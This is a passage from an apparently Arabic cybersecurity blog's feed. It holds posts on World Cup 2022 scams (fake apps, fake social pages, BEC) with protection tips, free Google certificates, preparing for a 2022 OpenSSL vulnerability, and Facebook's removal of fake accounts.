&lt;h2 id=&quot;تطبيقات-الموبايل-المزورة&quot;&gt;تطبيقات الموبايل المزورة&lt;/h2&gt;
&lt;p&gt;بالإضافة لاسم الدومين المميز تسعى معظم المؤسسات الآن لنشر تطبيق الهاتف المحمول الخاص بها والذي يستخدم للتواصل مع العملاء وتنفيذ العمليات بشكل سريع وتعزيز الولاء للعلامة التجارية وبالتأكد كأس العالم قطر 2022 ليس استثناءً، حيث تحتفظ الفيفا حالياً بتطبيقات رسمية متعددة عبر متاجر التطبيقات الرسمية&lt;/p&gt;
&lt;p&gt;في الوقت نفسه، يتم استغلال هذا الأمر لزيادة سطح الهجوم وبالفعل لقد تم نشر العشرات من التطبيقات الاحتيالية التي يتم توزيعها عبر متاجر التطبيقات غير الرسمية، تشكل هذه التطبيقات الضارة خطراً على المستخدمين ويمكن العثور عليها بسهولة عبر الإنترنت باستخدام محركات البحث&lt;/p&gt;
&lt;p&gt;من خلال نفس الدراسة السابقة تم تحديد 53 تطبيق خبيث ينتحل أمور متعلقة بكأس العالم قطر 2022 حتى أن بعضها متاح على متاجر رسمية مثل متجر Google Play عند تحليل هذه التطبيقات وجدنا تنوع وتعقيدات مختلفة ولكن وبشكل عام كل هذه التطبيقات كان لها هدف واحد وهو خداع المستخدم لسرقة معلوماته الحساسة أو نشر الإعلانات الخبيثة أو القيام بنشاطات خبيثة أخرى&lt;/p&gt;
&lt;h2 id=&quot;صفحات-التواصل-الاجتماعي-المزورة&quot;&gt;صفحات التواصل الاجتماعي المزورة&lt;/h2&gt;
&lt;p&gt;أصبحت صفحات وسائل التواصل الاجتماعي ركيزة أساسية لاستراتيجية الاتصال لكل مؤسسة في السنوات العشر الماضية وفي يومنا الحالي تعد هذه الصفحات ضرورية لبناء أي علامة تجارية وسهولة الوصول والتواصل مع العملاء&lt;/p&gt;
&lt;p&gt;يزور الملايين من مستخدمي الإنترنت كل يوم صفحات مواقع التواصل الاجتماعي المفضلة لديهم لمواكبة الإصدارات الجديدة والعروض والمعلومات في الوقت المناسب وبالتأكيد فإن هذا الأمر نفسه يتم مع الأحداث العالمية مثل كأس العالم قطر 2022 حيث يتدفق المشجعون على الصفحات الرسمية لمعرفة آخر الأخبار المتعلقة بهذا الحدث العالمي وبالتأكيد سيتم استغلال هذا الأمر من قبل المهاجمين ومجرمي الانترنت من خلال إنشاء صفحات مخادعة على مواقع التواصل الاجتماعي.&lt;/p&gt;
&lt;p&gt;وهنا تجدر الإشارة إلى أن مجموعات الاختراق والتهديد المستمر المتقدم APT تستخدم صفحات التواصل الاجتماعي لنشر معلومات مضللة أو لجمع معلومات حساسة عن الأهداف المحتملين وبالفعل لقد تم اكتشاف نشاط لمجموعة APT Lazarus التي ترعاه كوريا الشمالية مراراً وتكراراً لاستهداف الباحثين عن عمل على موقع LinkedIn بإعلانات وظائف احتيالية لخداعهم للنقر على الروابط الخبيثة.&lt;/p&gt;
&lt;p&gt;من خلال هذه الدراسة تم الوصول لعشرات الصفحات على مواقع التواصل الاجتماعي التي تنتحل شخصية أصول مملوكة أو متعلقة بكأس العالم قطر 2022 غالبية هذه الصفحات تنشر محتوى غير ضار ومع ذلك فقد حددنا العديد من الصفحات على موقع الفيسبوك والتي تستغل شعارات كأس العالم قطر 2022 لنشر عمليات الاحتيال مثل التسويق الهرمي كما ترى في المثال التالي:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;صفحة فيسبوك مزورة تحمل اسم كأس العالم قطر 2022 وتنشر عرضاً للتسويق الهرمي برابط مختصر لجذب المتابعين&quot; width=&quot;1600&quot; height=&quot;1000&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.BdHDqemX_Z2vAckf.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;صفحات التواصل الاجتماعي ليست مصدر القلق الوحيد عندما يتعلق الأمر بسرقة العلامة التجارية وانتحال الشعار فمن الممكن أيضاً انتحال الشخصيات المهمة والمديرين التنفيذيين لإجراء هجمات الهندسة الاجتماعية&lt;/p&gt;
&lt;p&gt;أحد الأساليب الأكثر شيوعاً التي يستخدمها المهاجمون هو انتحال صفة المدير التنفيذي للقيام بهجمات اختراق البريد الإلكتروني للأعمال BEC – Business Email Compromise وهذه الطريقة تتم من خلال خداع الموظف برسالة عبر البريد الالكتروني تبدو على أنها قادمة من مديره في العمل وتطلب منه القيام بتحويلات مالية بشكل مستعجل لحسابات خاصة بالمهاجمين&lt;/p&gt;
&lt;h2 id=&quot;الهجمات-التي-تستهدف-المنظم-للبطولة&quot;&gt;الهجمات التي تستهدف المنظم للبطولة&lt;/h2&gt;
&lt;p&gt;قد يتم أيضاً استهداف المنظمات القطرية أو المنظمات الأجنبية المسؤولة عن تنظيم هذه البطولة بهجمات برامج الفدية أو بهجمات منع الخدمة بهدف تعطيل عمل هذه المنظمات ومحاولة إفشال الجهود المبذولة من دولة قطر لإنجاح هذا الحدث العالمي وهنا يجب التأكيد على مراقبة هذه الجهات واتخاذ إجراءات الحماية الاستباقية والتأكد من وجود موارد بديلة لضمان عدم توقف أي من الخدمات في حال تعرضها لهجمات سيبرانية&lt;/p&gt;
&lt;h2 id=&quot;طرق-الحماية&quot;&gt;طرق الحماية&lt;/h2&gt;
&lt;p&gt;الآن وبعد أن ناقشنا بعض التهديدات الخطيرة للهيئات المنظمة لكأس العالم قطر 2022 وشركائها الرئيسيين والجهات الراعية وحتى المشجعين&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;يمكنك أن تسأل نفسك السؤال التالي: “هل يجب أن أشعر بالقلق حيال ذلك؟”&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;الإجابة على هذا السؤال هي نعم&lt;/p&gt;
&lt;p&gt;ولذلك يجب أن تتخذ بعض اجراءات الحماية الاستباقية والتي سوف ترفع راية التسلل للهجمات السيبرانية المحتملة ومنع المهاجمين من تحقيق أهدافهم في مرمانا&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;اتبع نهجاً قائماً على الشك في كل الأمور التي من الممكن أن تمثل تهديد محتمل وقم بتحديث نموذج التهديد الخاص بك مع تطور هذا المشهد&lt;/li&gt;
&lt;li&gt;كن حذراً بشأن المعلومات التي تقوم بمشاركتها عبر الإنترنت أو على وسائل التواصل الاجتماعي، مثل أسماء حيواناتك الأليفة والمدارس التي درست بها وأسماء أفراد عائلتك وتاريخ ميلادك والمعلومات الشخصية الأخرى، يمكن للمهاجمين استخدام هذه المعلومات للتخمين على كلمة السر الخاصة بك أو للإجابة على اسئلة الأمان الخاصة بحساباتك&lt;/li&gt;
&lt;li&gt;تجنب النقر على أي رابط في رسائل البريد الإلكتروني أو الرسائل النصية القادمة لك بشكل غير متوقع وتطلب منك تحديث معلومات الحساب أو التحقق منها، ابحث بشكل مستقل عن جهات الاتصال الرسمية للشركة واتصل بهم للتحقق من شرعية طلبهم&lt;/li&gt;
&lt;li&gt;افحص بشكل جيد روابط وعناوين المواقع وتأكد من الأحرف لضمان عدم وجود أي تبديل بسيط لا يمكن ملاحظته بشكل فوري&lt;/li&gt;
&lt;li&gt;قم بتفعيل المصادقة الثنائية أينما وجدت فهي حل سحري ضد العديد من الهجمات المحتملة&lt;/li&gt;
&lt;li&gt;قم بتحديث كل البرامج والتطبيقات وأنظمة التشغيل للتأكد من تطبيق التصحيحات الأمنية لسد الثغرات ونقاط الضعف ومنع المهاجمين من استغلالها&lt;/li&gt;
&lt;li&gt;تأكد من تحميلك للتطبيقات من المتاجر الرسمية وتأكد من الصلاحيات التي تطلبها هذه التطبيقات&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;في حال قمت بالشك بأي رابط أو صفحة أو تطبيق مزور تواصل معنا عبر الفيسبوك “&lt;a href=&quot;https://facebook.com/jameeltawelh&quot;&gt;المهندس جميل حسين طويله&lt;/a&gt;” لنقوم بإجراء عملية التحليل وتقديم نصائح الحماية&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>كأس العالم قطر 2022</category><category>التصيد الاحتيالي</category><category>انتحال الدومينات</category><category>تطبيقات مزورة</category><category>الهندسة الاجتماعية</category><category>BEC</category></item><item><title>شهادات مجانية من غوغل مهمة للحصول على عمل</title><link>https://blog.cyberpedia.site/free-certificates-from-google-are-important-to-get-a-job/</link><guid isPermaLink="true">https://blog.cyberpedia.site/free-certificates-from-google-are-important-to-get-a-job/</guid><description>تعرف على 6 شهادات من غوغل في التحليلات والإعلانات ودعم تكنولوجيا المعلومات وإدارة المشاريع وتصميم UX والتعليم، وفوائدها ومتطلباتها وهل تساعد في الحصول على عمل.</description><pubDate>Sat, 12 Nov 2022 09:36:29 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;شهادات غوغل برامج تعليمية عبر الإنترنت تطور مهارات المهنيين في التسويق وتكنولوجيا المعلومات وتصميم تجربة المستخدم والتعليم، ومعظمها لا يتطلب خبرة سابقة أو شهادة جامعية. أبرزها Google Analytics Academy وGoogle Ads وIT Support وProject Management وUX Design وGoogle for Education، وهي عادة مجانية أو منخفضة التكلفة وتثبت لأصحاب العمل مهارتك.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;شهادات غوغل هي برامج تعليمية عبر الإنترنت تساعد المهنيين الذين يعملون في مجالات مختلفة، مثل التسويق وتكنولوجيا المعلومات وتصميم تجربة المستخدم والتعليم على تطوير مهارات جديدة.&lt;/p&gt;
&lt;p&gt;تقدم غوغل شهادات في مختلف الصناعات ولا يتطلب معظمها أي خبرة سابقة أو درجة للتسجيل.&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-الشهادات-وتفاصيلها&quot;&gt;ما هي الشهادات وتفاصيلها؟&lt;/h2&gt;
&lt;p&gt;فيما يلي 6 شهادات من غوغل متاحة للمهنيين الراغبين في تطوير مهارات جديدة:&lt;/p&gt;
&lt;h3 id=&quot;google-analytics-academy&quot;&gt;&lt;a href=&quot;https://analytics.google.com/analytics/academy/&quot;&gt;Google Analytics Academy&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;تساعد أكاديمية Google Analytics أصحاب الأعمال والمهنيين الآخرين في التعرف على أدوات قياس تحسين محركات البحث, يساعد هذا المهنيين على تحسين العمليات التجارية من خلال طرق جمع البيانات وتحليل الكلمات الرئيسية, داخل الأكاديمية تقدم غوغل ست دورات لمساعدة مقالات الشركات أو مواقع الويب في الحصول على مرتبة عالية على غوغل أو محركات البحث الأخرى.&lt;/p&gt;
&lt;p&gt;من دورات التحليلات المبتدئة إلى المتقدمة، تزود هذه الشهادات المستخدمين بالمعرفة الأساسية لتحليل التقارير التي تركز على جمع البيانات وتكوينها, تتضمن شهادات التحليلات الأخرى وضع العلامات على الأساسيات وتحليلات 360 وهي دورة تدريبية متخصصة للمستخدمين للتعرف على عمليات الدمج مع البرامج الأخرى, تزود هذه الشهادات المحترفين بمهام واقعية يؤديها غالباً المتخصصون في تحسين محركات البحث أو مناصب التسويق.&lt;/p&gt;
&lt;h3 id=&quot;google-ads-certifications&quot;&gt;&lt;a href=&quot;https://ads.google.com/home/#!/&quot;&gt;Google Ads certifications&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;تقدم الاعتماد المهني الأساسي والمتقدم للمحترفين الذين يهدفون إلى تحسين حساباتهم في إعلانات غوغل ووجودهم التسويقي عبر الإنترنت, توفر هذه الشهادات للمحترفين دليلًا على أن غوغل تعترف بهم كمتخصصين في الإعلان عبر الإنترنت, يمكن لمتخصصي التسويق متابعة واحدة أو جميع الشهادات المتاحة في هذا البرنامج اعتماداً على خبرتهم مع إعلانات غوغل أو ما إذا كانت شركتهم تتطلب شهادات معينة.&lt;/p&gt;
&lt;p&gt;تتطلب شهادة الإعلانات من المحترفين أخذ بعض أو كل الدورات التدريبية والتقييمات المتاحة, عند إجراء اختبار إعلانات غوغل لديك 75 دقيقة لإكماله وتتطلب نتيجة 80٪ أو أكثر. كل شهادة من &lt;strong&gt;“إعلانات غوغل”&lt;/strong&gt; صالحة لمدة عام واحد, عند انتهاء صلاحية شهادتك يمكنك تجديدها من خلال إجراء تقييم جديد في مجال المنتج المعني.&lt;/p&gt;
&lt;h3 id=&quot;google-it-support-professional-certificate&quot;&gt;&lt;a href=&quot;https://grow.google/certificates/it-support/#?modal_active=none&quot;&gt;Google IT Support Professional Certificate&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;باعتبارها دورة تدريبية على المستوى التمهيدي لتكنولوجيا المعلومات، فإن هذه الشهادة مخصصة للمهنيين الذين يرغبون في بدء حياة مهنية في تشغيل وصيانة أنظمة الكمبيوتر والشبكات الخاصة بالشركة, تساعد هذه الدورة المهنيين الذين يتابعون وظائف قائمة على التكنولوجيا، مثل فنيي مكتب المساعدة ومسؤولي قواعد البيانات ومحللي النظام, هذه الشهادة مهمة لأنها تساعد المهنيين على أداء مهام تكنولوجيا المعلومات الأساسية، مثل تجميع أجهزة كمبيوتر الشركة والشبكات اللاسلكية وتثبيت البرامج ومسؤوليات خدمة العملاء.&lt;/p&gt;
&lt;p&gt;يحتوي هذا البرنامج على أكثر من 100 ساعة تعليمية مع 10 ساعات مخصصة وموصى بها في الأسبوع, يتضمن العديد من التقييمات القائمة على الممارسة لسيناريوهات تكنولوجيا المعلومات في العالم الحقيقي لمساعدتك على التفوق في مكان العمل, يمكن أن يسمح لك الحصول على هذه الشهادة أيضًا بالحصول على أرصدة جامعية للحصول على درجة الزمالة, ضع في اعتبارك البحث عما إذا كانت جامعتك أو كليتك تمنحك اعتمادات للحصول على هذه الشهادة.&lt;/p&gt;
&lt;h3 id=&quot;google-project-management-professional-certificate&quot;&gt;&lt;a href=&quot;https://grow.google/certificates/project-management/#?modal_active=none&quot;&gt;Google Project Management Professional Certificate&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;توفر الشهادة الاحترافية في إدارة المشاريع من غوغل للمهنيين المبتدئين المهارات اللازمة للتميز في تخطيط المشاريع وتنظيمها وقيادتها, هذه الدورة مخصصة للمهنيين الذين يتابعون وظائف في إدارة المشاريع أو إدارة البرامج أو تحليل البرامج أو مهام سكروم, عند إجراء هذه التقييمات توقع أن تتعلم مهارات مثل تحديد المخاطر وإدارتها وإدارة أصحاب المصلحة وتقدير الوقت والميزانيات, تساعد هذه الدورة أيضاً المهنيين على التعرف على برامج إدارة المشاريع الشائعة والمنهجيات الرشيقة وعلى وجه التحديد طرق سكروم.&lt;/p&gt;
&lt;p&gt;يقوم خبراء غوغل الذين لديهم خلفية في إدارة المشاريع بتدريس هذه الشهادة المكونة من ست دورات, يحتوي هذا البرنامج على أكثر من 140 ساعة من التدريس مع 10 ساعات مخصصة وموصى بها في الأسبوع, يتضمن العديد من التقييمات القائمة على الممارسة لسيناريوهات إدارة المشاريع في العالم الحقيقي لمساعدتك على التفوق في مكان العمل.&lt;/p&gt;
&lt;h3 id=&quot;google-ux-design-professional-certificate&quot;&gt;&lt;a href=&quot;https://grow.google/certificates/project-management/#?modal_active=none&quot;&gt;Google UX Design Professional Certificate&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;صممت غوغل شهادة UX Design Professional الخاصة بها للمحترفين الذين يسعون إلى الحصول على وظيفة في تصميم تجربة المستخدم (UX), تساعد هذه الدورة المتقدمين على التركيز على تفاعل المستخدم مع مختلف المواقع والتطبيقات, كما أنه يزودك بالمهارات اللازمة لجعل هذه التفاعلات سهلة الوصول وقيمة وممتعة للمستخدمين, يحتوي هذا البرنامج على أكثر من 200 ساعة من التدريس والتي أكملها العديد من المتقدمين في أقل من ستة أشهر.&lt;/p&gt;
&lt;p&gt;في هذه الدورة يمكنك إنشاء رسومات يدوية وتطبيقها باستخدام أدوات التصميم الرقمية التي تتعلق بمشاريع تصميم تجربة المستخدم في العالم الحقيقي, تزود هذه الدورة محترفي تكنولوجيا المعلومات بالمعرفة الأساسية اللازمة لأداء العديد من مهام تجربة المستخدم، بما في ذلك بناء الهياكل الشبكية وإجراء أبحاث UX وإنشاء تصميمات عالية الجودة. في نهاية هذه الدورة، غالبًا ما يمتلك المتقدمون محفظة UX احترافية تتضمن ثلاثة مشاريع مكتملة يمكن أن تساعدك في البدء في التقدم للوظائف.&lt;/p&gt;
&lt;h3 id=&quot;google-for-education-certifications&quot;&gt;&lt;a href=&quot;https://edu.google.com/intl/ALL_us/for-educators/certification-programs/product-expertise/educator-level1/?modal_active=none&quot;&gt;Google for Education certifications&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;تقدم غوغل دورتين تدريبيتين للحصول على الشهادات للمعلمين الذين يبدؤون حياتهم المهنية وأولئك الذين يسعون إلى معرفة أكثر تقدماً, تتضمن كلتا الشهادتين شارة إتمام معتمدة من غوغل والتي يمكنك تضمينها في سيرتك الذاتية أو محفظتك أو موقع الويب أو أي وثائق مهنية أخرى لمساعدتك على فصل نفسك عن المتقدمين التنافسيين, توفر كل دورة تدريبية في Google for Education للمعلمين فرصاً لتحسين عمليات مشاركة الطلاب عند إنشاء خطط الدروس ومنهج دراسي كامل.&lt;/p&gt;
&lt;h2 id=&quot;فوائد-الحصول-على-شهادات-غوغل&quot;&gt;فوائد الحصول على شهادات غوغل&lt;/h2&gt;
&lt;p&gt;فيما يلي قائمة بالمزايا التي قد يكسبها المتقدمون من خلال الحصول على شهادة غوغل:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;تعلم قدرات جديدة:&lt;/strong&gt; تسمح العديد من شهادات غوغل للمهنيين المبتدئين بتعلم مهارات جديدة مطلوبة لبدء حياتهم المهنية في الوظيفة أو الصناعة المطلوبة.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;تطوير مهاراتك:&lt;/strong&gt; بالنسبة لأولئك الذين يهدفون إلى تعزيز معرفتهم أو تأمين ترقية أو متابعة مسؤوليات جديدة، تقدم غوغل دورات شهادات متقدمة لمساعدتك في توسيع مهاراتك التقنية.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;أظهر خبرتك:&lt;/strong&gt; تسمح الشهادات للمهنيين بإثبات لأصحاب العمل الحاليين أو المحتملين أنهم معتمدون بالمهارات المطلوبة لأداء المهام بكفاءة وفعالية.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;كن أحد شركاء Google:&lt;/strong&gt; تقدم غوغل أيضاً للشركات فرصة لتصبح شريكاً في غوغل أو شريكاً مميزاً حتى تتمكن مؤسستهم من إثبات للعملاء أو المرشحين الموهوبين أنهم يمتلكون معرفة متخصصة في مجالات تخصصهم.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;هل-شهادات-غوغل-مربحة&quot;&gt;هل شهادات غوغل مربحة؟&lt;/h2&gt;
&lt;p&gt;يتيح لك الحصول على شهادة غوغل أن تثبت لأصحاب العمل أنك ماهر في برنامج أو مجال أو صناعة معينة, يمكن أن يساعدك الحصول على شهادة في الحصول على وظيفة جديدة أو متابعة فرص التقدم الوظيفي وكلاهما يمكن أن يوفر رواتب أعلى أو تنافسية, ضع في اعتبارك مقارنة الراتب الأعلى الذي قد تتمكن من الحصول عليه بحقيقة أن دورات شهادات غوغل عادة ما تكون مجانية أو غير مكلفة نسبيًا للمهنيين الذين يهدفون إلى بدء حياتهم المهنية أو التقدم فيها.&lt;/p&gt;
&lt;h2 id=&quot;هل-الخبرة-السابقة-أو-شهادة-جامعية-مطلوبة&quot;&gt;هل الخبرة السابقة أو شهادة جامعية مطلوبة؟&lt;/h2&gt;
&lt;p&gt;لا تتطلب معظم الشهادات التي تقدمها غوغل أي خبرة أو تعليم سابق, يختلف كل برنامج، حيث تخصص غوغل بعض الدورات التدريبية للمهنيين المبتدئين والتي غالباً لا تتطلب أي معرفة سابقة ومع ذلك، تتطلب بعض البرامج المزيد من الخبرة أو المعرفة بالموضوع.&lt;/p&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;يجب عليك الأعتراف بأن لا شيء يقف في طريق تحقيق أهدافك من حصول على عمل أو تطوير ذاتك, كل ذلك يعتمد على البدء.&lt;/p&gt;
&lt;p&gt;لذا يجب عليك دائماً أن (تخطط بشكل كبير – تحلم بالمزيد – لكن يجب أن تنفذ الآن) لا مبرر لضياع الوقت دون إنجاز أو اكتساب المعرفة.&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>شهادات غوغل</category><category>شهادات مجانية</category><category>Google IT Support</category><category>Google Ads</category><category>تطوير المهارات</category></item><item><title>استعد بشكل جيد للتعامل مع ثغرة جديدة في OpenSSL</title><link>https://blog.cyberpedia.site/openssl-critical-vulnerability/</link><guid isPermaLink="true">https://blog.cyberpedia.site/openssl-critical-vulnerability/</guid><description>ثغرة حرجة أعلن عنها مشروع OpenSSL في الإصدار 3.0 وما فوق عام 2022: آثارها المحتملة، ومقارنتها بثغرة Heartbleed، وكيف تستعد الشركات قبل الإصلاح.</description><pubDate>Fri, 28 Oct 2022 16:51:08 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;أعلن مشروع OpenSSL في 26 أكتوبر 2022 عن ثغرة حرجة في الإصدار 3.0 وما فوق، على أن يصلحها الإصدار 3.0.7 في الأول من نوفمبر. لا يُعرف بعد إن كانت بخطورة Heartbleed، لذا على المؤسسات أن تجرد الآن كل البرامج والأجهزة التي تستخدم OpenSSL 3.0 استعداداً لتطبيق التصحيح فور صدوره.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;استعد بشكل جيد للتعامل مع الثغرة الجديدة في OpenSSL المختلفة عن الثغرة المشهورة Heartbleed فمن الممكن أن يكون لها تداعيات أمنية خطيرة&lt;/p&gt;
&lt;p&gt;لدى المنظمات والشركات خمسة أيام للتحضير لما وصفه مشروع OpenSSL في 26 أكتوبر من عام 2022 بأنه ثغرة أمنية “حرجة” في الإصدار 3.0 وما فوق من مكتبة التشفير المستخدمة في كل مكان تقريباً لتشفير الاتصالات على الإنترنت&lt;/p&gt;
&lt;p&gt;في يوم الثلاثاء الأول من نوفمبر من عام 2022 سيصدر المشروع إصداراً جديداً من OpenSSL (الإصدار 3.0.7) والذي سيصلح عيباً لم يتم الكشف عنه بعد في الإصدارات الحالية وستحدد خصائص الثغرة الأمنية والطريقة التي يمكن استغلالها لتتمكن مختلف الجهات من معالجة المشكلة&lt;/p&gt;
&lt;h2 id=&quot;الآثار-الخطيرة-المحتملة&quot;&gt;الآثار الخطيرة المحتملة&lt;/h2&gt;
&lt;p&gt;من المرجح أن يكون لدى بائعي أنظمة التشغيل الرئيسية وناشري البرامج وموفري خدمات البريد الإلكتروني وشركات التكنولوجيا التي قامت بدمج OpenSSL في منتجاتها وخدماتها إصدارات محدثة من تقنياتهم بالتزامن مع كشف مشروع OpenSSL عن الخلل يوم الثلاثاء المقبل و لكن هذا الأمر سيترك ملايين آخرين (بما في ذلك الوكالات الفيدرالية والشركات الخاصة ومقدمي الخدمات ومصنعي أجهزة الشبكات وعدد لا يحصى من مشغلي مواقع الويب) أمام موعد نهائي يلوح في الأفق للعثور على الثغرة الأمنية وإصلاحها قبل أن يبدأ المهاجمون باستغلالها&lt;/p&gt;
&lt;p&gt;إذا تبين أن الثغرة الأمنية الجديدة خطيرة بشكل مشابه لثغرة Heartbleed (وهي ثغرة سابقة كانت تؤثر على OpenSSL) فستكون شبكة الانترنت بأكملها تحت التهديد وبحاجة لمعالجة المشكلة في أسرع وقت ممكن&lt;/p&gt;
&lt;p&gt;ثغرة Heartbleed (CVE-2014-0160) والتي تم الكشف عنها في عام 2014 أعطت بشكل أساسي للمهاجمين طريقة للتنصت على اتصالات الإنترنت وسمحت لهم بسرقة البيانات من الخدمات والمستخدمين كما سمحت لهم بتنفيذ هجمات انتحال الشخصية لخدمات مختلفة، كان الخطأ موجود في إصدارات OpenSSL من مارس 2012 فصاعداً وأثر على مجموعة واسعة من التقنيات بما في ذلك سيرفرات الويب المستخدمة على نطاق واسع مثل Nginx, Apache, and IIS ومنظمات وشركات كبيرة مثل Google, Akamai, CloudFlare, and Facebook بالإضافة لسيرفرات البريد الإلكتروني وخدمات المحادثة وأجهزة الشبكة من شركات مثل Cisco والشبكات الخاصة الافتراضية VPN&lt;/p&gt;
&lt;p&gt;أثار الكشف عن هذا الخطأ نوبة من النشاط العلاجي من مختلف الجهات المعنية وأثارت مخاوف من تسويات كبيرة، كما أشار موقع Heartbleed.com فقد استحوذت تطبيقات سيرفرات الويب Apache and Nginx وحدهما على حصة سوقية تزيد عن 66٪ من المواقع النشطة على الإنترنت في وقت الكشف عن ثغرة Heartbleed&lt;/p&gt;
&lt;p&gt;إلى الآن ليس هناك من يخبرنا (حتى يوم الثلاثاء الأول من نوفمبر لعام 2022 على الأقل) ما إذا كان الخلل الجديد سيكون مثل Heartbleed ولكن نظراً للاستخدام المهم للبنية التحتية لـ OpenSSL لتشفير الاتصالات عبر الإنترنت فمن الأفضل للمؤسسات عدم التقليل من شأن هذا التهديد&lt;/p&gt;
&lt;h2 id=&quot;يجب-أن-تستعد-الشركات-بشكل-جيد&quot;&gt;يجب أن تستعد الشركات بشكل جيد&lt;/h2&gt;
&lt;p&gt;وفقاً ل Johannes Ullrich عميد الأبحاث في معهد SANS: من الصعب بعض الشيء التكهن بالتأثير ولكن التجربة السابقة أظهرت أن OpenSSL لا يستخدم تسمية “حرجة” لأمر بسيط التأثير&lt;/p&gt;
&lt;p&gt;يُستخدم الإصدار 3.0 وهو الإصدار الحالي من OpenSSL في العديد من أنظمة التشغيل الحالية مثل Ubuntu 22.04 LTS, MacOS Mavericks, and Ventura لذا على المؤسسات أن تتوقع تلقي تحديثات تحوي على إصلاحات خاصة بتوزيعات Linux بشكل سريع وبنفس الوقت الذي نشرته OpenSSL يوم الثلاثاء القادم&lt;/p&gt;
&lt;p&gt;ولكن يجب أن تستعد المؤسسات الآن لمعرفة الأنظمة التي تستخدم OpenSSL 3.0، قدم OpenSSL هذه الإعلانات المسبقة عن تصحيحات الأمان لمساعدة المنظمات في الاستعداد للتعامل مع هذا الخلل، لذا استغل هذا الوقت لمعرفة ما الذي يحتاج إلى إصلاح&lt;/p&gt;
&lt;p&gt;ووفقاً ل Brian Fox الشريك المؤسس ورئيس قسم التكنولوجيا في Sonatype فإنه إلى أن يحين الوقت الذي يكشف فيه مشروع OpenSSL عن هذا الخطأ يوم الثلاثاء 1/11/2022 تحتاج المؤسسات إلى تحديد ما إذا كانت تستخدم إصداراً مصاباً بهذه الثغرة وفي أي مكان ضمن الأنظمة الخاصة بها أو ضمن التطبيقات التي تستخدمها والاستعداد بشكل جيد لمعالجة هذه المشكلة&lt;/p&gt;
&lt;p&gt;أي تطبيق يتصل بالإنترنت بشكل آمن يمكن أن يحتوي على OpenSSL مدمج بداخله وقد لا يقتصر الأمر على البرامج ومن الممكن أن تتأثر الأجهزة أيضاً، لذا يجب أن يمنح الإشعار المسبق المقدم من مشروع OpenSSL المؤسسات الوقت للاستعداد والعثور على كل البرامج أو الأجهزة التي تحوي على الإصدار المصاب (يجب القيام بهذا الأمر الآن) وبعد ذلك سيتم تطبيق التصحيح أو تحديد مصادر التحديثات من البائعين الرئيسيين، كل ما يمكنك فعله في الوقت الحالي هو جرد الأصول التي من الممكن أن تكون مصابة&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>OpenSSL</category><category>ثغرات أمنية</category><category>Heartbleed</category><category>التشفير</category><category>إدارة التحديثات</category></item><item><title>فيسبوك تغلق ملايين الحسابات</title><link>https://blog.cyberpedia.site/facebook-deleting-fake-accounts/</link><guid isPermaLink="true">https://blog.cyberpedia.site/facebook-deleting-fake-accounts/</guid><description>حذفت فيسبوك 1.6 مليار حساب مزيف في الربع الأول من 2022. تعرّف على تأثير الحذف على الصفحات والمؤثرين، ونصائح تحمي حسابك من الإغلاق.</description><pubDate>Wed, 12 Oct 2022 02:53:31 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;حذفت فيسبوك 1.6 مليار حساب مزيف في الربع الأول من عام 2022 بحسب Statista، بعد رقم قياسي بلغ نحو 2.2 مليار حساب في الربع الأول من 2019. تأثرت بذلك الصفحات والمؤثرون الذين دعموا صفحاتهم بمتابعين مزيفين فانخفض وصولهم، وأُغلقت الصفحات المستنسخة نهائياً، بينما لم يلاحظ أغلب المستخدمين العاديين أي تغيير.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;قامت شركة &lt;strong&gt;“فيسبوك”&lt;/strong&gt; بحملة واسعة لإزالة الحسابات المزيفة من على منصتها حيث أوضح &lt;a href=&quot;https://www.statista.com/statistics/1013474/facebook-fake-account-removal-quarter/&quot;&gt;تقرير&lt;/a&gt; &lt;strong&gt;“statista”&lt;/strong&gt; بأن الشركة قامت في الربع الأول من عام 2022 بحذف 1.6 مليار حساب مزيف حيث انخفض من 1.7 مليار في الربع السابق.&lt;/p&gt;
&lt;p&gt;بينما في الربع الأول من عام 2019، تمت إزالة رقم قياسي بحوالي 2.2 مليار حساب مزيف بواسطة منصة التواصل الاجتماعي فيسبوك ذلك لأن Meta تعتبر الحسابات المزيفة حسابات تم إنشاؤها بقصد خبيث أو تم إنشاؤها لتمثيل شركة أو مؤسسة أو كيان غير بشري.&lt;/p&gt;
&lt;p&gt;عدد الحسابات المزيفة التي اتخذت فيسبوك إجراءً بحقها حول العالم، بالمليون (المصدر: Statista، فيسبوك):&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;الفترة&lt;/th&gt;
&lt;th&gt;عدد الحسابات (مليون)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
